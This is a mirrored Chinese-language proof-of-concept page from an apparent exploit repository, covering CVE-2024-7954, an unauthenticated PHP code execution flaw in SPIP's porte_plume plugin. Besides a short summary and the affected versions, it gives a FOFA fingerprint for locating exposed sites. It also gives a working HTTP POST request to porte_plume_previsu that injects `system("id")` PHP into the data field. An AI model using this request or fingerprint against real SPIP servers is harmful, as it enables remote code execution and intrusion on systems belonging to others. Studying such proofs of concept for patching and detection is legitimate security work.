mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 10:25:55 +00:00
31 lines
1.1 KiB
Markdown
31 lines
1.1 KiB
Markdown
|
|
# SPIP插件porte_plume存在任意PHP执行漏洞(CVE-2024-7954)
|
|||
|
|
|
|||
|
|
# 一、漏洞简介
|
|||
|
|
SPIP 4.30-alpha2、4.2.13、4.1.16之前的版本使用的porte_plume插件存在任意代码执行漏洞,远程未经身份验证的攻击者可以通过发送精心设计的HTTP 请求以SPIP用户身份执行任意PHP代码。
|
|||
|
|
|
|||
|
|
# 二、影响版本
|
|||
|
|
SPIP插件porte_plume
|
|||
|
|
|
|||
|
|
# 三、资产测绘
|
|||
|
|
+ fofa`icon_hash=="-1224668706"`
|
|||
|
|
+ 特征
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
# 四、漏洞复现
|
|||
|
|
```java
|
|||
|
|
POST /index.php?action=porte_plume_previsu HTTP/1.1
|
|||
|
|
Host:
|
|||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
|
|||
|
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
|
Content-Length: 0
|
|||
|
|
|
|||
|
|
data=AA_[<img111111>->URL`<?php system("id");?>`]_BB
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
> 更新: 2024-09-05 23:21:35
|
|||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gzh7mvbhub0l35ct>
|